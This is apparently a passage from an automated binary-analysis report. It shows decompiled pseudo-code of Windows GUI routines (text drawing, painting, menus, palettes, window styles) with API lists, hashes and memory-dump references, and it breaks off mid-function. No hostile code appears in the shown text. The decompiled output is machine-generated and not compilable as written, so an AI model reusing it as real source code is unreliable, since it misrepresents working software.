                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Draw$OffsetRectText$Edge
                                                                                • String ID:
                                                                                • API String ID: 3610532707-0
                                                                                • Opcode ID: 433828e7e3ec566315ab3be7533957cae28c9e632e97fc2d6305ba227f22d50c
                                                                                • Instruction ID: 68969ed9cb05b664d4419c1763d0a6a8e74d1c20bfe0b3deb612a047e544336f
                                                                                • Opcode Fuzzy Hash: 433828e7e3ec566315ab3be7533957cae28c9e632e97fc2d6305ba227f22d50c
                                                                                • Instruction Fuzzy Hash: F7516174A04648AFEF10EBA9C881B9EB7E5EF45314F24856BF910E7392C73CAD418719
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0042A6C8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 77%
                                                                                			E0042A6C8(intOrPtr* __eax, void* __ebx, signed int __ecx, struct tagRECT* __edx, void* __edi, void* __esi) {
				char _v8;
				int _t40;
				CHAR* _t42;
				int _t54;
				CHAR* _t56;
				int _t65;
				CHAR* _t67;
				intOrPtr* _t76;
				intOrPtr _t86;
				struct tagRECT* _t91;
				signed int _t93;
				int _t94;
				intOrPtr _t97;
				signed int _t104;

				_push(0);
				_t93 = __ecx;
				_t91 = __edx;
				_t76 = __eax;
				_push(_t97);
				_push(0x42a81e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t97;
				 *((intOrPtr*)( *__eax + 0x90))();
				if((__ecx & 0x00000400) != 0 && (_v8 == 0 ||  *((char*)(__eax + 0x170)) != 0 &&  *_v8 == 0x26 &&  *((char*)(_v8 + 1)) == 0)) {
					E004045E0( &_v8, 0x42a834);
				}
				if( *((char*)(_t76 + 0x170)) == 0) {
					_t104 = _t93;
				}
				_t94 = E00437978(_t76, _t93, _t104);
				E0041FCC0( *((intOrPtr*)(_t76 + 0x160)));
				if( *((intOrPtr*)( *_t76 + 0x50))() != 0) {
					_t40 = E004045D8(_v8);
					_t42 = E004047D0(_v8);
					DrawTextA(E0041FDC4( *((intOrPtr*)(_t76 + 0x160))), _t42, _t40, _t91, _t94);
				} else {
					OffsetRect(_t91, 1, 1);
					E0041EB4C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000014);
					_t54 = E004045D8(_v8);
					_t56 = E004047D0(_v8);
					DrawTextA(E0041FDC4( *((intOrPtr*)(_t76 + 0x160))), _t56, _t54, _t91, _t94);
					OffsetRect(_t91, 0xffffffff, 0xffffffff);
					E0041EB4C( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000010);
					_t65 = E004045D8(_v8);
					_t67 = E004047D0(_v8);
					DrawTextA(E0041FDC4( *((intOrPtr*)(_t76 + 0x160))), _t67, _t65, _t91, _t94);
				}
				_pop(_t86);
				 *[fs:eax] = _t86;
				_push(0x42a825);
				return E00404320( &_v8);
			}

















                                                                                0x0042a6cb
                                                                                0x0042a6d0
                                                                                0x0042a6d2
                                                                                0x0042a6d4
                                                                                0x0042a6d8
                                                                                0x0042a6d9
                                                                                0x0042a6de
                                                                                0x0042a6e1
                                                                                0x0042a6eb
                                                                                0x0042a6f7
                                                                                0x0042a721
                                                                                0x0042a721
                                                                                0x0042a72d
                                                                                0x0042a72f
                                                                                0x0042a72f
                                                                                0x0042a73e
                                                                                0x0042a749
                                                                                0x0042a757
                                                                                0x0042a7e8
                                                                                0x0042a7f1
                                                                                0x0042a803
                                                                                0x0042a75d
                                                                                0x0042a762
                                                                                0x0042a775
                                                                                0x0042a77f
                                                                                0x0042a788
                                                                                0x0042a79a
                                                                                0x0042a7a4
                                                                                0x0042a7b7
                                                                                0x0042a7c1
                                                                                0x0042a7ca
                                                                                0x0042a7dc
                                                                                0x0042a7dc
                                                                                0x0042a80a
                                                                                0x0042a80d
                                                                                0x0042a810
                                                                                0x0042a81d

                                                                                APIs
                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 0042A762
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A79A
                                                                                • OffsetRect.USER32(?,000000FF,000000FF), ref: 0042A7A4
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A7DC
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042A803
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: DrawText$OffsetRect
                                                                                • String ID:
                                                                                • API String ID: 1886049697-0
                                                                                • Opcode ID: b60231cd72ad85705e77e8efa6ebb8b133de81342258a358bc1fefc26b871bcd
                                                                                • Instruction ID: 4b3dc32afda254e071bd1cc5476ee5deb2a80a2c0b6ed73c94728484337b1361
                                                                                • Opcode Fuzzy Hash: b60231cd72ad85705e77e8efa6ebb8b133de81342258a358bc1fefc26b871bcd
                                                                                • Instruction Fuzzy Hash: 8231A070600114AFDB10EB2ADC85F8BB7F8AF46318F5440BBF904EB292CB789D119729
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00439A64, Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 85%
                                                                                			E00439A64(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t55;
				void* _t64;
				struct HDC__* _t75;
				intOrPtr _t84;
				void* _t95;
				void* _t96;
				void* _t98;
				void* _t100;
				void* _t101;
				intOrPtr _t102;

				_t100 = _t101;
				_t102 = _t101 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t75 =  *(_v12 + 4);
				if(_t75 == 0) {
					_t75 = BeginPaint(E0043BD14(_v8),  &_v84);
				}
				_push(_t100);
				_push(0x439b84);
				_push( *[fs:edx]);
				 *[fs:edx] = _t102;
				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
					_v20 = SaveDC(_t75);
					_v16 = 2;
					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
					if(_t95 >= 0) {
						_t96 = _t95 + 1;
						_t98 = 0;
						do {
							_t64 = E00413FA4( *((intOrPtr*)(_v8 + 0x198)), _t98);
							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t98 = _t98 + 1;
							_t96 = _t96 - 1;
						} while (_t96 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0xb8))();
					}
					RestoreDC(_t75, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0xb8))();
				}
				E00439BC0(_v8, 0, _t75);
				_pop(_t84);
				 *[fs:eax] = _t84;
				_push(0x439b8b);
				_t55 = _v12;
				if( *((intOrPtr*)(_t55 + 4)) == 0) {
					return EndPaint(E0043BD14(_v8),  &_v84);
				}
				return _t55;
			}


















                                                                                0x00439a65
                                                                                0x00439a67
                                                                                0x00439a6d
                                                                                0x00439a70
                                                                                0x00439a76
                                                                                0x00439a7b
                                                                                0x00439a8f
                                                                                0x00439a8f
                                                                                0x00439a93
                                                                                0x00439a94
                                                                                0x00439a99
                                                                                0x00439a9c
                                                                                0x00439aa9
                                                                                0x00439ac3
                                                                                0x00439ac6
                                                                                0x00439ad9
                                                                                0x00439adc
                                                                                0x00439ade
                                                                                0x00439adf
                                                                                0x00439ae1
                                                                                0x00439aec
                                                                                0x00439af5
                                                                                0x00439b07
                                                                                0x00000000
                                                                                0x00439b09
                                                                                0x00439b25
                                                                                0x00439b2c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00439b2c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00439b2e
                                                                                0x00439b2e
                                                                                0x00439b2f
                                                                                0x00439b2f
                                                                                0x00439ae1
                                                                                0x00439b32
                                                                                0x00439b36
                                                                                0x00439b3f
                                                                                0x00439b3f
                                                                                0x00439b4a
                                                                                0x00439aab
                                                                                0x00439ab2
                                                                                0x00439ab2
                                                                                0x00439b56
                                                                                0x00439b5d
                                                                                0x00439b60
                                                                                0x00439b63
                                                                                0x00439b68
                                                                                0x00439b6f
                                                                                0x00000000
                                                                                0x00439b7e
                                                                                0x00439b83

                                                                                APIs
                                                                                • BeginPaint.USER32(00000000,?), ref: 00439A8A
                                                                                • SaveDC.GDI32(?), ref: 00439ABE
                                                                                • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 00439B20
                                                                                • RestoreDC.GDI32(?,?), ref: 00439B4A
                                                                                • EndPaint.USER32(00000000,?,00439B8B), ref: 00439B7E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                • String ID:
                                                                                • API String ID: 3808407030-0
                                                                                • Opcode ID: 910f335cdd0922cf31afe9397841251fae4aface1fcd7c0656e0dbac6a07a740
                                                                                • Instruction ID: a0e3ca0c4c3b25b8cfb113fc5e9187cfd12e9294f5ee593db24c94ab03605c7e
                                                                                • Opcode Fuzzy Hash: 910f335cdd0922cf31afe9397841251fae4aface1fcd7c0656e0dbac6a07a740
                                                                                • Instruction Fuzzy Hash: 28414B70A04204AFCB04DF99C884EAEB7F9FF48318F1590AAE5049B362D7B9AD45CB54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00466B10, Relevance: 7.6, APIs: 5, Instructions: 86COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E00466B10(void* __ecx, void* __edx, void* __eflags, signed int _a4, char _a8, void* _a12) {
				struct tagRECT _v20;
				void* __edi;
				void* __ebp;
				int _t17;
				CHAR* _t19;
				int _t31;
				CHAR* _t33;
				int _t43;
				CHAR* _t45;
				void* _t49;
				signed int _t56;
				int _t57;
				void* _t61;

				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t60 = __ecx;
				_t49 = __edx;
				_t56 = _a4;
				E0041F454( *((intOrPtr*)(__edx + 0x14)), __ecx, 1, _t56, _t61, __eflags);
				if(_a8 != 1) {
					_t57 = _t56 | 0x00000005;
					__eflags = _t57;
					_t17 = E004045D8(__ecx);
					_t19 = E004047D0(__ecx);
					return DrawTextA(E0041FDC4(_t49), _t19, _t17,  &_v20, _t57);
				}
				OffsetRect( &_v20, 1, 1);
				E0041EB4C( *((intOrPtr*)(_t49 + 0xc)), 0x80000014);
				_t31 = E004045D8(_t60);
				_t33 = E004047D0(_t60);
				DrawTextA(E0041FDC4(_t49), _t33, _t31,  &_v20, _t56 | 0x00000005);
				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
				E0041EB4C( *((intOrPtr*)(_t49 + 0xc)), 0x80000010);
				_t43 = E004045D8(_t60);
				_t45 = E004047D0(_t60);
				return DrawTextA(E0041FDC4(_t49), _t45, _t43,  &_v20, _t56 | 0x00000005);
			}
















                                                                                0x00466b1f
                                                                                0x00466b20
                                                                                0x00466b21
                                                                                0x00466b22
                                                                                0x00466b23
                                                                                0x00466b25
                                                                                0x00466b27
                                                                                0x00466b2f
                                                                                0x00466b38
                                                                                0x00466bc0
                                                                                0x00466bc0
                                                                                0x00466bca
                                                                                0x00466bd2
                                                                                0x00000000
                                                                                0x00466be0
                                                                                0x00466b46
                                                                                0x00466b53
                                                                                0x00466b64
                                                                                0x00466b6c
                                                                                0x00466b7a
                                                                                0x00466b87
                                                                                0x00466b94
                                                                                0x00466ba3
                                                                                0x00466bab
                                                                                0x00000000

                                                                                APIs
                                                                                • OffsetRect.USER32(?,00000001,00000001), ref: 00466B46
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00466B7A
                                                                                • OffsetRect.USER32(?,000000FF,000000FF), ref: 00466B87
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00466BB9
                                                                                • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00466BE0
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: DrawText$OffsetRect
                                                                                • String ID:
                                                                                • API String ID: 1886049697-0
                                                                                • Opcode ID: a4a248901a044ac9540b5c370ce27b35c249500a1b3aa5b27dd0c2d65dfffe11
                                                                                • Instruction ID: 325a6e5ce17f83a1198e6ea69a1305357d63e4c9b3ccf8f14f770f2d088acb65
                                                                                • Opcode Fuzzy Hash: a4a248901a044ac9540b5c370ce27b35c249500a1b3aa5b27dd0c2d65dfffe11
                                                                                • Instruction Fuzzy Hash: 17219FB170011467CB00FA6A9C81A9F72AC5F45728F05062FBA25F7282DA7DE9054369
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0044583C, Relevance: 7.6, APIs: 5, Instructions: 77COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0044583C(int __eax, void* __edx) {
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				int _t46;
				int _t47;
				intOrPtr* _t48;

				_t18 = __eax;
				_t48 = __eax;
				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
						 *((char*)(__eax + 0x74)) = 1;
						return __eax;
					}
					_t19 =  *((intOrPtr*)(__eax + 0x6c));
					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
						return E0044583C(_t19, __edx);
					}
					_t18 = GetMenuItemCount(E0044596C(__eax));
					_t47 = _t18;
					_t40 = _t39 & 0xffffff00 | _t47 == 0x00000000;
					while(_t47 > 0) {
						_t46 = _t47 - 1;
						_t18 = GetMenuState(E0044596C(_t48), _t46, 0x400);
						if((_t18 & 0x00000004) == 0) {
							_t18 = RemoveMenu(E0044596C(_t48), _t46, 0x400);
							_t40 = 1;
						}
						_t47 = _t47 - 1;
					}
					if(_t40 != 0) {
						if( *((intOrPtr*)(_t48 + 0x64)) != 0) {
							L14:
							E00445708(_t48);
							L15:
							return  *((intOrPtr*)( *_t48 + 0x3c))();
						}
						_t44 =  *0x44435c; // 0x4443a8
						if(E00403740( *((intOrPtr*)(_t48 + 0x70)), _t44) == 0 || GetMenuItemCount(E0044596C(_t48)) != 0) {
							goto L14;
						} else {
							DestroyMenu( *(_t48 + 0x34));
							 *(_t48 + 0x34) = 0;
							goto L15;
						}
					}
				}
				return _t18;
			}









                                                                                0x0044583c
                                                                                0x00445840
                                                                                0x00445846
                                                                                0x00445850
                                                                                0x00445852
                                                                                0x00000000
                                                                                0x00445852
                                                                                0x0044585b
                                                                                0x00445860
                                                                                0x00000000
                                                                                0x00445862
                                                                                0x00445874
                                                                                0x00445879
                                                                                0x0044587d
                                                                                0x00445882
                                                                                0x0044588b
                                                                                0x00445895
                                                                                0x0044589c
                                                                                0x004458ac
                                                                                0x004458b1
                                                                                0x004458b1
                                                                                0x004458b3
                                                                                0x004458b4
                                                                                0x004458ba
                                                                                0x004458c0
                                                                                0x004458f5
                                                                                0x004458f7
                                                                                0x004458fc
                                                                                0x00000000
                                                                                0x00445902
                                                                                0x004458c5
                                                                                0x004458d2
                                                                                0x00000000
                                                                                0x004458e5
                                                                                0x004458e9
                                                                                0x004458f0
                                                                                0x00000000
                                                                                0x004458f0
                                                                                0x004458d2
                                                                                0x004458ba
                                                                                0x00445909

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: c15339dd9b36668f47d8c9902b8558479ebbf9f4d3e662fa3b47d0d84adcacfa
                                                                                • Instruction ID: 4e1899da5d7f6748348b46f9fe3f1e7a3c70c1476eddfc55fcc1ecb0efe02a5a
                                                                                • Opcode Fuzzy Hash: c15339dd9b36668f47d8c9902b8558479ebbf9f4d3e662fa3b47d0d84adcacfa
                                                                                • Instruction Fuzzy Hash: 44116061B01B48DBFF60BE3A890575B27889F52B58F45442FBD42AB283CE3CDC15829C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0045522C, Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0045522C(void* __eax, void* __ecx, struct HWND__** __edx) {
				intOrPtr _t11;
				intOrPtr _t20;
				void* _t30;
				void* _t31;
				void* _t33;
				struct HWND__** _t34;
				struct HWND__* _t35;
				struct HWND__* _t36;

				_t31 = __ecx;
				_t34 = __edx;
				_t33 = __eax;
				_t30 = 0;
				_t11 =  *((intOrPtr*)(__edx + 4));
				if(_t11 < 0x100 || _t11 > 0x108) {
					L16:
					return _t30;
				} else {
					_t35 = GetCapture();
					if(_t35 != 0) {
						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x487714 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
					_t36 =  *_t34;
					_t2 = _t33 + 0x44; // 0x0
					_t20 =  *_t2;
					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
						L7:
						if(E004325B4(_t36, _t31) == 0 && _t36 != 0) {
							_t36 = GetParent(_t36);
							goto L7;
						}
						if(_t36 == 0) {
							_t36 =  *_t34;
						}
						goto L11;
					} else {
						_t36 = E0043BD14(_t20);
						L11:
						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
							_t30 = 1;
						}
						goto L16;
					}
				}
			}











                                                                                0x0045522c
                                                                                0x00455230
                                                                                0x00455232
                                                                                0x00455234
                                                                                0x00455236
                                                                                0x0045523e
                                                                                0x004552dd
                                                                                0x004552e3
                                                                                0x0045524f
                                                                                0x00455254
                                                                                0x00455258
                                                                                0x004552be
                                                                                0x004552db
                                                                                0x004552db
                                                                                0x00000000
                                                                                0x004552be
                                                                                0x0045525a
                                                                                0x0045525c
                                                                                0x0045525c
                                                                                0x00455261
                                                                                0x0045527c
                                                                                0x00455285
                                                                                0x0045527a
                                                                                0x00000000
                                                                                0x0045527a
                                                                                0x0045528d
                                                                                0x0045528f
                                                                                0x0045528f
                                                                                0x00000000
                                                                                0x0045526b
                                                                                0x00455270
                                                                                0x00455291
                                                                                0x004552aa
                                                                                0x004552ac
                                                                                0x004552ac
                                                                                0x00000000
                                                                                0x004552aa
                                                                                0x00455261

                                                                                APIs
                                                                                • GetCapture.USER32 ref: 0045524F
                                                                                • SendMessageA.USER32(00000000,-0000BBEE,0046AE10,?), ref: 004552A3
                                                                                • GetWindowLongA.USER32 ref: 004552B3
                                                                                • SendMessageA.USER32(00000000,-0000BBEE,0046AE10,?), ref: 004552D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: MessageSend$CaptureLongWindow
                                                                                • String ID:
                                                                                • API String ID: 1158686931-0
                                                                                • Opcode ID: 260178c8c49f67dc7e552513bb903ecf6adffe9dc5e6df834c033165cfa38a6f
                                                                                • Instruction ID: 99e34f074c7de9a5728527735dec4b3c0637da1b987c04b54cf2be62137685ec
                                                                                • Opcode Fuzzy Hash: 260178c8c49f67dc7e552513bb903ecf6adffe9dc5e6df834c033165cfa38a6f
                                                                                • Instruction Fuzzy Hash: EF119371204A096FD660FA9AC950B7773DC9B18315F20057AFD59D3383EA6CFC048B69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004242C8, Relevance: 7.6, APIs: 5, Instructions: 66windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 78%
                                                                                			E004242C8(struct HPALETTE__* __eax) {
				struct HPALETTE__* _t21;
				char _t28;
				signed int _t30;
				struct HPALETTE__* _t36;
				struct HPALETTE__* _t37;
				struct HDC__* _t38;
				intOrPtr _t39;

				_t21 = __eax;
				_t36 = __eax;
				_t39 =  *((intOrPtr*)(__eax + 0x28));
				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
					_t22 =  *((intOrPtr*)(_t39 + 0x14));
					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
						E00422C48(_t22);
					}
					_t21 = E004208AC( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
					_t37 = _t21;
					 *(_t39 + 0x10) = _t37;
					if(_t37 == 0) {
						_push(0);
						L00406E20();
						_t21 = E004201BC(_t21);
						_t38 = _t21;
						if( *((char*)(_t39 + 0x71)) != 0) {
							L9:
							_t28 = 1;
						} else {
							_push(0xc);
							_push(_t38);
							L00406AF8();
							_push(0xe);
							_push(_t38);
							L00406AF8();
							_t30 = _t21 * _t21;
							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
							if(_t30 < _t21) {
								goto L9;
							} else {
								_t28 = 0;
							}
						}
						 *((char*)(_t39 + 0x71)) = _t28;
						if(_t28 != 0) {
							_t21 = CreateHalftonePalette(_t38);
							 *(_t39 + 0x10) = _t21;
						}
						_push(_t38);
						_push(0);
						L00407080();
						if( *(_t39 + 0x10) == 0) {
							 *((char*)(_t36 + 0x30)) = 1;
							return _t21;
						}
					}
				}
				return _t21;
			}










                                                                                0x004242c8
                                                                                0x004242cc
                                                                                0x004242ce
                                                                                0x004242d5
                                                                                0x004242ef
                                                                                0x004242f5
                                                                                0x004242f7
                                                                                0x004242f7
                                                                                0x0042430e
                                                                                0x00424313
                                                                                0x00424315
                                                                                0x0042431a
                                                                                0x0042431c
                                                                                0x0042431e
                                                                                0x00424323
                                                                                0x00424328
                                                                                0x0042432e
                                                                                0x00424357
                                                                                0x00424357
                                                                                0x00424330
                                                                                0x00424330
                                                                                0x00424332
                                                                                0x00424333
                                                                                0x0042433a
                                                                                0x0042433c
                                                                                0x0042433d
                                                                                0x00424342
                                                                                0x0042434d
                                                                                0x00424351
                                                                                0x00000000
                                                                                0x00424353
                                                                                0x00424353
                                                                                0x00424353
                                                                                0x00424351
                                                                                0x00424359
                                                                                0x0042435e
                                                                                0x00424361
                                                                                0x00424366
                                                                                0x00424366
                                                                                0x00424369
                                                                                0x0042436a
                                                                                0x0042436c
                                                                                0x00424375
                                                                                0x00424377
                                                                                0x00000000
                                                                                0x00424377
                                                                                0x00424375
                                                                                0x0042431a
                                                                                0x0042437f

                                                                                APIs
                                                                                • 72E7AC50.USER32(00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042431E
                                                                                • 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424333
                                                                                • 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042433D
                                                                                • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424361
                                                                                • 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042436C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: B380CreateHalftonePalette
                                                                                • String ID:
                                                                                • API String ID: 178651289-0
                                                                                • Opcode ID: 91b32b8e0bb386d6f312d455e8532609e2f0d464e724ed159cd995770b339d27
                                                                                • Instruction ID: ad94edfb46578ea6a9ee65a130ec521f0314f5c0519a73110df1165b84e8db0c
                                                                                • Opcode Fuzzy Hash: 91b32b8e0bb386d6f312d455e8532609e2f0d464e724ed159cd995770b339d27
                                                                                • Instruction Fuzzy Hash: 2F11DA217043659ADB20EF75E4417EF3690EF81358F84012BFC50A62C1D3BC8890C3A9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00452988, Relevance: 7.6, APIs: 5, Instructions: 63COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 62%
                                                                                			E00452988(void* __eax) {
				void* _t16;
				void* _t37;
				void* _t38;
				signed int _t41;

				_t16 = __eax;
				_t38 = __eax;
				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x46bb20 != 0) {
					_t16 = E0043C018(__eax);
					if(_t16 != 0) {
						_t41 = GetWindowLongA(E0043BD14(_t38), 0xffffffec);
						if( *((char*)(_t38 + 0x2e0)) != 0 ||  *((char*)(_t38 + 0x2e2)) != 0) {
							if((_t41 & 0x00080000) == 0) {
								SetWindowLongA(E0043BD14(_t38), 0xffffffec, _t41 | 0x00080000);
							}
							return  *0x46bb20(E0043BD14(_t38),  *((intOrPtr*)(_t38 + 0x2e4)),  *((intOrPtr*)(_t38 + 0x2e1)),  *0x0046BBA4 |  *0x0046BBAC);
						} else {
